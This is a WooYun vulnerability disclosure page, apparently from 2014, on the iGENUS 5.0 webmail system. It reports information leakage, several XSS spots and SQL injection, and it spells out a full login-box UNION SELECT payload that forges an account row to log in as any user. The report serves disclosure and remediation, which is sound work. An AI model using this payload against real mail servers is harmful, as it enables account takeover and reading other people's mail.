当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047768

漏洞标题:iGENUS5.0邮件系统的一些漏洞打包(注射及登陆等)

相关厂商:爱琴思科技

漏洞作者: clzzy

提交时间:2014-01-03 15:26

修复时间:2014-02-17 15:26

公开时间:2014-02-17 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-03: 细节已通知厂商并且等待厂商处理中
2014-01-08: 厂商已经确认,细节仅向厂商公开
2014-01-18: 细节向核心白帽子及相关领域专家公开
2014-01-28: 细节向普通白帽子公开
2014-02-07: 细节向实习白帽子公开
2014-02-17: 细节向公众公开

简要描述:

没事的时候下载了iGENUS5.0来看了看,时间紧,只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。

详细说明:

先说下我使用的版本和环境:

.PNG


2.PNG


3.PNG


整套程序,没有防注入措施,除邮件标题和外没有放XSS错误,导致漏洞一大堆,以下测试均在魔术引号关闭的情况下进行(php5.4以后魔术引号就默认关闭了)
1、信息泄露(开发者用于调试的功能):

ver.PNG


ver2.PNG


3.PNG


2、各种xss:
反射性:

xss.PNG


xss.PNG


发送邮件时,邮件中插入图片,图片地址和描述存在xss:

xss.png


邮件签名xss:

xss.PNG


xss2.PNG


系统日志xss可以x管理员(域管理员和系统管理员),还可以csrf(大家自己去试):

xss.PNG


xss.PNG


3、注入存在性:

sql2.png


sql.png


4、登陆框SQL注入导致登陆任意存在的账户,或者登陆自己的账户查看别人的邮件(iGENUS的邮件存放在文件夹中):
登陆框输入:

baidu' and 1=2 union select 9999,'baidu','mydomains.com','$1$cKT9CGj7$svBg/NeQckI2rvfm2GWc40',0,0,'','/home/vpopmail/domains/mydomains.com/baidu','104857600S','1','2013-12-31 16:39:38','2015-12-31 00:00:00',1,1048,10,'/home/netdisk/mydomains.com/../',0,1048,0,1,0,0 from vpopmail where 'a'='a


2.png


.png


3.png


漏洞证明:

sql2.png


sql.png

修复方案:

其实这套系统还有很多花样可以玩,程序写得不怎么样。另外网上能找到的使用这套系统的网站版本分化比较大。测试的时候差异性比较明显。

版权声明:转载请注明来源 clzzy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-01-08 08:17

厂商回复:

至8日上午,针对igenus 5.0、5.5以及其他多个版本的实例测试工作仍在进行。对于存储型XSS,暂未重点测试,目前重点测试SQL注入。
同时,先行根据本地测试结果对上述漏洞进行确认。rank 20

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-08 09:06 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    mark

  2. 2014-01-28 13:30 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    我去?牛逼啊